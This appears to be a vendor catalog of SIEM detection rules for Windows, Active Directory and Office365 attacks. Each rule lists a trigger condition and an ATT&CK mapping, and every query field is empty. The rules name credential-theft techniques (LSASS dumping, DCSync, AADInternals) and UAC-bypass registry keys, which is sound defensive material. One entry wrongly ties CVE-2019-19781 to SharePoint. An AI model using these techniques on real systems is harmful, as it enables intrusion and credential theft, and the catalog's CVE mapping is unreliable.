Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Persistence through Port Monitor Registry modification
Trigger Condition: A new entry in the printer monitor registry is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Boot or Logon Autostart Execution, Port Monitors
ATT&CK ID: T1547, T1547.010
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_File Dropped in Suspicious Location
Trigger Condition: Dropping a file in a suspicious system location is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Ingress Tool Transfer
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Alternate PowerShell Hosts via Powershell Module
Trigger Condition: Alternate PowerShell host trying to bypass detections based on powershell.exe. Adversaries can use this technique to potentially bypass detections looking for powershell.exe. They can use it to discover information or execute malicious code.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Usage of Where Binary
Trigger Condition: An enumeration attempt on browser bookmarks to learn more about compromised hosts is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Browser Bookmark Discovery
ATT&CK ID: T1217
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_MSHTA - Activity Detected
Trigger Condition: Network connection events initiated by mshta.exe are detected. Adversaries abuse mshta.exe for proxy execution of malicious .hta files, and Javascript or VBScript through a trusted Windows utility.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Signed Binary Proxy Execution, Mshta
ATT&CK ID: T1218, T1218.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Alternate PowerShell Hosts via Named Pipe
Trigger Condition: This alert is triggered whenever it detects alternate Command and Scripting Interpreter, PowerShell hosts. PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary. Adversaries might use this technique to potentially bypass detections looking for powershell.exe. Logging for named pipe events must be configured in the Sysmon config for this alert to work. However, programs using PowerShell directly without invocation of a dedicated interpreter might trigger false positives.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
Trigger Condition: Suspicious child processes spawned by Microsoft Office products such as Excel, PowerPoint, OneNote or Visio are detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell, Windows Command Shell, Malicious File
ATT&CK ID: T1059, T1059.001, T1059.003, T1204.002
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_RClone Utility Execution
Trigger Condition: Execution of the RClone tool or command line option used in the tool. Adversaries can utilize this utility to exfiltrate data to cloud storage.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Web Service, Exfiltration to Cloud Storage
ATT&CK ID: T1567, T1567.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_UAC Bypass via SDCLT
Trigger Condition: Attempt to bypass User Account Control (UAC) via SDCLT.exe, or modification of the registry keys HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand and HKCU:\Software\Classes\Folder\shell\open\command, indicating UAC bypass via registry key manipulation of sdclt.exe.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Binary Execution in User Directory
Trigger condition: Execution of binaries from the user's directory by Microsoft Office software such as Word and Excel. This may indicate dropping and subsequent execution of payloads by malicious Microsoft Office documents.
ATT&CK Category: Execution
ATT&CK Tag: Malicious File
ATT&CK ID: T1204.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WMIC Child Process
Trigger condition: A suspicious child process of WMIC is detected. Adversaries can utilize this technique to execute arbitrary commands and payloads and to evade defenses by using a Windows internal binary.
ATT&CK Category: Execution
ATT&CK Tag: Windows Management Instrumentation
ATT&CK ID: T1047
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious File Execution Using Wscript or Cscript
Trigger condition: This alert is triggered whenever a file with the extension jse, vbe, js or vba is executed using wscript or cscript. Wscript and cscript are Windows binaries that provide an environment in which users can execute scripts in a variety of languages, or start a script to run in a command-line environment. Adversaries can write malicious payloads in files with the above-mentioned extensions and execute them using wscript or cscript to bypass detection.
ATT&CK Category: Execution
ATT&CK Tag: Visual Basic, JavaScript
ATT&CK ID: T1059.005, T1059.007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_BCDEdit Safe Mode Command Execution
Trigger condition: This alert is triggered whenever spawning of BCDEDIT from suspicious processes is detected to configure a reboot into Safe Mode. Safe Mode is a diagnostic mode in Windows that starts the system with a limited set of drivers and services, allowing users to troubleshoot problems that may be preventing the system from starting normally. Bcdedit is a Windows internal binary that allows users to view and modify the boot configuration data (BCD) settings. Adversaries can use Safe Mode commands such as “minimal”, “network”, and “safebootalternateshell” to bypass security mechanisms and execute arbitrary commands with elevated privileges, as only a limited set of software and services is available in safe boot mode.
ATT&CK Category: Impact
ATT&CK Tag: Inhibit System Recovery
ATT&CK ID: T1490
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Encoded PowerShell Command Line
Trigger condition: A suspicious PowerShell base64 encoded command is detected. Adversaries can use this technique to evade defense mechanisms by encoding and decoding the payload.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Persistence Attack through Accessibility Process Feature
Trigger condition: Accessibility features used to execute a command prompt or other backdoors are detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, Accessibility Features
ATT&CK ID: T1546, T1546.008
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Firewall Rule Addition via Netsh Detected
Trigger condition: This alert is triggered whenever a connection is allowed by a port or application on the Windows firewall. An attacker can use the Netsh utility to add or modify firewall rules to allow unauthorized network traffic to bypass the firewall and reach its target. For example, an attacker could use Netsh to allow inbound connections on a specific. Legitimate administration activity and software installations and removals also trigger this alert.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify System Firewall
ATT&CK ID: T1562, T1562.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Exploitation of CVE-2019-1388 Detected
Trigger condition: An exploitation attempt of CVE-2019-1388, in which the UAC consent dialogue is used to invoke a Windows process running as LOCAL_SYSTEM, is detected. CVE-2019-1388 is an elevation of privilege vulnerability in the Windows Certificate Dialog.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Exploitation for Privilege Escalation
ATT&CK ID: T1068
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Sophos EPP Registry Modification
Trigger condition: Modification of Sophos EPP Tamper Protection registry keys to turn off services is detected. Sophos EPP Tamper Protection is a service offered by the EPP that constantly checks whether malware, an adversary or a rogue employee turns off the AV services to avoid detection.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Office365 Inbox Rule with Special Characters Created
Trigger condition: A new inbox rule created on Office365 with a suspicious name made of only special characters is detected.
ATT&CK Category: Collection
ATT&CK Tag: Email Forwarding Rule
ATT&CK ID: T1114.003
Minimum Log Source Requirement: Office365
Query:
LP_Suspicious WerFault Process Creation
Trigger condition: services.exe spawning a werfault.exe process from a non-default path is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WerFault File Creation
Trigger condition: A non-system process dropping the WerFault.exe binary inside the C:\Windows\WinSxS folder is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Snake Malware Covert Store Registry Key Detected
Trigger condition: A registry operation for the key SECURITY\Policy\Secrets\n is detected. Snake malware utilizes this registry key to store the encryption key.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WerFault Service Creation
Trigger condition: A new service installed using the WerFault.exe file is detected. WerFault.exe is a system component that plays a crucial role in Windows operating systems. It manages system error reporting.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Named Pipe Connection to Azure AD Connect Database
Trigger condition: A named pipe connection to the Azure AD Connect database from suspicious processes such as command shells like PowerShell is detected, which may indicate attackers attempting to dump plaintext credentials of the AD and Azure AD connector accounts using tools such as AADInternals.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Driver Loaded
Trigger condition: Misuse of known drivers by adversaries for malicious purposes is detected. The drivers themselves are not malicious but are misused by threat actors. For this alert to trigger, the SUSPICIOUS_DRIVER list is required.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_AADInternals PowerShell Cmdlet Execution
Trigger condition: Execution of AADInternals cmdlets is detected. The AADInternals (S0677) toolkit is a PowerShell module containing tools for administering and hacking Azure AD and Office 365. Adversaries use AADInternals to extract credentials from the system where the AAD Connect server was installed and compromise the AAD environment.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Suspicious Scheduled Task Creation via Masqueraded XML File
Trigger condition: Creation of a suspicious scheduled task using an XML file with a masqueraded extension.
ATT&CK Category: Persistence, Defense Evasion
ATT&CK Tag: Masquerading, Match Legitimate Name or Location, Scheduled Task/Job, Scheduled Task
ATT&CK ID: T1036, T1036.005, T1053, T1053.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Microsoft Equation Editor Child Process
Trigger condition: This alert is triggered whenever a suspicious child process of Microsoft's Equation Editor is detected, which is a sign of possible exploitation of CVE-2017-11882. CVE-2017-11882 is a vulnerability in Microsoft Office's Equation Editor component. An attacker might use the vulnerability to execute arbitrary code on a target system by producing a malicious Microsoft Office file (such as a Word document) that, when opened, activates the vulnerability.
ATT&CK Category: Execution
ATT&CK Tag: Exploitation for Client Execution
ATT&CK ID: T1203
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows Error Process Masquerading
Trigger condition: Suspicious Windows error reporting process behavior, where network connections are made after execution is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Bypass UAC via CMSTP Detected
Trigger condition: Child processes of automatically elevated Microsoft Connection Manager Profile Installer instances like cmstp.exe are detected.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: CMSTP, Bypass User Account Control
ATT&CK ID: T1218.003, T1548.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Application Whitelisting Bypass via Dxcap Detected
Trigger condition: This alert is triggered whenever execution of Dxcap.exe to bypass process and/or signature-based defenses is detected. DXCap.exe is a command-line tool for graphics diagnostics capture and playback. Adversaries may take advantage of this trusted developer utility to proxy the execution of malicious payloads. Legitimate execution of dxcap.exe by a legitimate user could generate false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Trusted Developer Utilities Proxy Execution
ATT&CK ID: T1127
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WMIC XSL Script Execution
Trigger condition: Loading of a Windows Script module through WMIC by the Microsoft Core XML Services (MSXML) process to bypass application whitelisting is detected. Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control.
ATT&CK Category: Defense Evasion
ATT&CK Tag: XSL Script Processing
ATT&CK ID: T1220
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious File Execution via MSHTA
Trigger condition: Execution of JavaScript or VBScript files, and files with other abnormal extensions, via the mshta binary is detected.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: JavaScript, Deobfuscate/Decode Files or Information, Mshta
ATT&CK ID: T1059.007, T1140, T1218.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Regsvr32 Anomalous Activity Detected
Trigger condition: This alert is triggered whenever it detects various anomalous Regsvr32.exe activities. Regsvr32 is a command-line utility used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Adversaries often abuse Regsvr32 for proxy execution of malicious code.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution, Regsvr32
ATT&CK ID: T1218, T1218.010
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution of Trojanized 3CX Application
Trigger Condition: Execution of the trojanized version of the 3CX Desktop is detected. 3CX Desktop versions 18.12.407 and 18.12.416 are known to be trojanized by the Lazarus Group and are also signed using the 3CX signature.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Msbuild Spawned by Unusual Parent Process
Trigger condition: Suspicious use of msbuild.exe by an uncommon parent process is detected. msbuild.exe is a legitimate Microsoft tool used for building and deploying software applications.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Trusted Developer Utilities Proxy Execution, MSBuild
ATT&CK ID: T1127, T1127.001
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Files Designated as System Files Detected
Trigger condition: The execution of the +s option of the attrib command is detected to designate scripts or executable files in suspicious locations as system files, hiding them from users and making them difficult to detect or remove. attrib.exe is a Windows command-line utility that allows users to adjust file or folder attributes such as read-only, hidden and system.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hide Artifacts, Hidden Files and Directories
ATT&CK ID: T1564, T1564.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Bypass User Account Control using Registry
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Unsigned Image Loaded Into LSASS Process
Trigger condition: Loading unsigned images like DLL or EXE into the LSASS process.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory
ATT&CK ID: T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Usage of Sysinternals Tools Detected
Trigger condition: Usage of Sysinternals tools is detected through the addition of the accepteula key to the registry.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Microsoft SharePoint Remote Code Execution Detected
Trigger condition: The execution of remote code in Microsoft SharePoint (CVE-2019-19781) is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, IDS/IPS, Web server
Query:
LP_DenyAllWAF SQL Injection Attack
Trigger condition: DenyAll WAF detects an SQL injection attack.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: DenyAll WAF
Query:
LP_Malicious use of Scriptrunner Detected
Trigger condition: The malicious use of Scriptrunner.exe is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Javascript conversion to executable Detected
Trigger condition: The Windows executable jsc.exe is used to convert JavaScript files into crafted malicious executables.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Trusted Developer Utilities Proxy Execution
ATT&CK ID: T1127
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution of Gpscript Detected
Trigger condition: The Group Policy script host gpscript.exe is used to execute logon or startup scripts configured in Group Policy.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Proxy Execution via Desktop Setting Control Panel
Trigger condition: The Windows internal binary rundll32 with desk.cpl is used to execute a spoofed binary with the “.cpl” extension.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Rundll32
ATT&CK ID: T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Xwizard DLL Side Loading Detected
Trigger condition: The use of the xwizard binary from a non-default directory is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: DLL Side-Loading
ATT&CK ID: T1574.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_DLL Side Loading Via Microsoft Defender
Trigger condition: Execution of the mpcmdrun binary from a non-default path is detected.
ATT&CK Category: Persistence, Defense Evasion
ATT&CK Tag: DLL Side-Loading
ATT&CK ID: T1574.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_ZIP File Creation or Extraction via Printer Migration CLI Tool
Trigger condition: The creation or extraction of a .zip file via the printbrm utility is detected.
ATT&CK Category: Defense Evasion, Command and Control
ATT&CK Tag: Ingress Tool Transfer, NTFS File Attributes
ATT&CK ID: T1105, T1564.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Credentials Capture via Rpcping Detected
Trigger condition: The creation of a Remote Procedure Call (RPC) via the Rpcping binary is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_C-Sharp Code Compilation Using Ilasm Detected
Trigger condition: C# code is compiled into an executable or a DLL using the Ilasm utility.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Trusted Developer Utilities Proxy Execution
ATT&CK ID: T1127
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Dump via Resource Leak Diagnostic Tool
Trigger condition: A process dump using the Microsoft Windows native tool rdrleakdiag.exe is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious DLL execution via Register-Cimprovider
Trigger condition: A DLL file load or execution using the Microsoft Windows native tool Register-Cimprovider.exe is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hijack Execution Flow
ATT&CK ID: T1574
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Accessibility Features-Registry
Trigger condition: An adversary establishes persistence and/or elevates privileges by executing malicious content, replacing accessibility feature binaries, or modifying pointers or references to these binaries in the registry.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, Accessibility Features
ATT&CK ID: T1546, T1546.008
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Active Directory DLLs Loaded By Office Applications
Trigger condition: This alert is triggered whenever it detects that the Kerberos DLL or the DSParse DLL is loaded by Office products such as winword, powerpoint, excel or outlook.
ATT&CK Category: Execution
ATT&CK Tag: Malicious File
ATT&CK ID: T1204.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DCSync detected
Trigger condition: Misuse of the Active Directory Replication Service (ADRS) from a non-machine account to request credentials, or a DCSync attempt by creating a new SPN, is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, DCSync
ATT&CK ID: T1003, T1003.006
Minimum Log Source Requirement: Windows
Query:
LP_Active Directory Replication User Backdoor
Trigger condition: This alert is triggered whenever it detects modification of the security descriptor of a domain object to grant all Active Directory replication permissions to any user. The security descriptor contains the access control lists (ACLs) of the resource. With directory replication permission, adversaries can perform a DCSync attack.
ATT&CK Category: Defense Evasion
ATT&CK Tag: File and Directory Permissions Modification, Windows File and Directory Permissions Modification, DCSync
ATT&CK ID: T1222, T1222.001, T1003.006
Minimum Log Source Requirement: Windows
Query:
LP_AD Object WriteDAC Access Detected
Trigger condition: WRITE_DAC, which can modify the discretionary access-control list (DACL) in the object security descriptor, is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: File and Directory Permissions Modification
ATT&CK ID: T1222
Minimum Log Source Requirement: Windows
Query:
LP_AD Privileged Users or Groups Reconnaissance Detected
Trigger condition: Privileged user or group reconnaissance, based on event ID 4661 and the SIDs of privileged users or groups, is detected. The object names must be one of: domain admin, KDC service account, admin account, enterprise admin, group policy creators and owners, backup operator, or remote desktop users.
ATT&CK Category: Discovery
ATT&CK Tag: Account Discovery, Local Account, Domain Account
ATT&CK ID: T1087, T1087.001, T1087.002
Minimum Log Source Requirement: Windows
Query:
LP_Addition of SID History to Active Directory Object
Trigger condition: Addition of SID History to Active Directory Object is detected. An attacker can use the SID history attribute to gain additional privileges.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Access Token Manipulation, SID-History Injection
ATT&CK ID: T1134, T1134.005
Minimum Log Source Requirement: Windows
Query:
LP_Admin User Remote Logon Detected
Trigger condition: Successful remote login by the administrator depending on the internal pattern is detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Windows
Query:
LP_Adwind RAT JRAT Detected
Trigger condition: Applications like javaw.exe or cscript in the AppData folder, or Windows Run* registry values set by Adwind or JRAT, are detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, Visual Basic, JavaScript/JScript, Windows Command Shell, PowerShell
ATT&CK ID: T1059, T1059.001, T1059.003, T1059.005, T1059.007
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Apache Struts 2 Remote Code Execution Detected
Trigger condition: Exploitation of the remote code execution vulnerability (CVE-2017-5638) in Apache Struts 2 is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: ApacheTomcat
Query:
LP_AppCert DLLs Detected
Trigger condition: Adversaries establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, AppCert DLLs
ATT&CK ID: T1546, T1546.009
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Application Whitelisting Bypass via Dnx Detected
Trigger condition: Execution of Dnx binary with ConsoleApp commandline argument is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Compile After Delivery, Signed Binary Proxy Execution
ATT&CK ID: T1027.004, T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Authentication Package Detected
Trigger Condition: The LSA process loaded by services other than lsass, svchost, msiexec and services is detected. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. Adversaries may abuse authentication packages to execute DLLs when the system boots.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Authentication Package, Security Support Provider
ATT&CK ID: T1547.002, T1547.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Bloodhound and Sharphound Hack Tool Detected
Trigger Condition: This alert is triggered whenever it detects usage of the Bloodhound and Sharphound hack tools through the command line or a process. BloodHound is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment. SharpHound is the official data collector for BloodHound. Adversaries can use these tools to perform reconnaissance and identify vulnerable endpoints.
ATT&CK Category: Discovery
ATT&CK Tag: Account Discovery
ATT&CK ID: T1087
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_LSASS Access from Non System Account Detected
Trigger Condition: This alert is triggered whenever it detects potential mimikatz-like tools accessing LSASS from a non-system account. The Local Security Authority Subsystem Service (lsass.exe) is the process on an Active Directory domain controller responsible for providing Active Directory database lookups, authentication, and replication. The credential data inside LSASS may include Kerberos tickets, NTLM password hashes, LM password hashes, and even clear-text passwords (to support WDigest and SSP authentication, among others). Adversaries look to get access to this credential data and do so by finding a way to access the contents of the LSASS process memory. Looking for non-system accounts getting a handle on and accessing lsass is crucial to detect lsass dumping attempts.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows
Query:
LP_LSASS Memory Dump Detected
Trigger Condition: Process access to lsass.exe with elevated access rights is detected. Adversaries can use this technique to gain access to lsass process memory and dump credentials.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_LSASS Memory Dump File Creation
Trigger Condition: LSASS memory dump creation using operating system utilities is detected. Procdump uses the process name in the output file name if no name is specified.
ATT&CK Category: Credential Access
ATT&CK Tag: Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_LSSAS Memory Dump with MiniDumpWriteDump API Detected
Trigger condition: This alert is triggered whenever it detects the use of the MiniDumpWriteDump API for dumping lsass.exe memory in a stealthy way. Tools like ProcessHacker and some attacker tradecraft use this API, found in dbghelp.dll or dbgcore.dll. As an example, the SilentTrynity C2 framework has a module that leverages this API to dump the contents of lsass.exe and transfer it over the network back to the attacker's machine.
ATT&CK Category: Defense Evasion, Credential Access
ATT&CK Tag: Masquerading, OS Credential Dumping, LSASS Memory
ATT&CK ID: T1036, T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Macro file Creation Detected
Trigger Condition: This alert is triggered whenever macro file creation is detected. A macro is a script or program that automates tasks within applications like Microsoft Office through VBScript. It is essential to detect the creation of macro files on the system, as adversaries often use macro-enabled files to deliver malware, exploit vulnerabilities, or trick users into enabling malicious code.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, Visual Basic
ATT&CK ID: T1059, T1059.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Malicious Base64 Encoded PowerShell Keywords in Command Lines Detected
Trigger Condition: When base64-encoded strings are used in hidden, malicious Command and Scripting Interpreter (PowerShell) command lines. Adversaries hide their activities by encoding commands to bypass detection with this technique.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious File Execution Detected
Trigger Condition: Execution of a suspicious file by wscript and cscript.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Malware Shellcode in Verclsid Target Process
Trigger Condition: A process accessing verclsid.exe that injects shellcode from a Microsoft Office application or VBA macro is detected.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection, Verclsid
ATT&CK ID: T1055, T1218.012
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_RSA SecurID Passcode Reuse
Trigger Condition: This alert is triggered when a passcode reuse event occurs.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: RSA Secure ID
LP_Suspicious Atbroker Execution Detected
Trigger Condition: This alert is triggered whenever AtBroker is detected executing non-default Assistive Technology applications.
ATT&CK Category: Defense Evasion
ATT&CK Tag: System Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious MMC Process Pattern
Trigger Condition: This alert is triggered when .msc (Microsoft Management Console) files are executed from outside the default Windows path: C:\Windows\System32.
ATT&CK Category: Defense Evasion
ATT&CK Tag: MMC
ATT&CK ID: T1218.014
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Windows unBlock Inheritance on OU or Domain
Trigger Condition: This alert is triggered whenever Group Policy inheritance is set to unblocked on an OU or domain.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Group Policy Modification
ATT&CK ID: T1484.001
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Application Whitelisting Bypass with DLL load via ODBC
Trigger Condition: This alert is triggered when the odbcconf executable loads DLLs.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Odbcconf
ATT&CK ID: T1218.008
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Possible UAC Bypass via System Configuration Utility
Trigger Condition: This alert is triggered when msconfig token modification is used to possibly bypass UAC.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Bypass User Account Control
ATT&CK ID: T1548.002
Minimum Log Source Requirement: Windows, Windows Sysmon
Query: